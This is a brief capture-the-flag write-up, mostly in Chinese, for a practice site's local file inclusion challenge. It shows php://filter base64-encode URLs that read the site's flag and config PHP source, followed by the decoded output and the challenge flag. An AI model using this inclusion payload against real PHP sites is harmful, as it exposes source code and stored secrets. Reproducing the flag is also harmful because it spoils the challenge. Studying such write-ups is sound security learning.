Description:
What this admin’s password? That is not important at all, just get the flag.
Tips: LFI, php://filter
Solution:
其实见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本地文件
https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag
发现网页出现一行base64
Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K
base64解码得
Can you read the flag<?php require('config.php'); ?>?
所以写网址为
https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config
得到base64
PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==
base64解码得<?php $flag = "FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}";
Flag:
FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}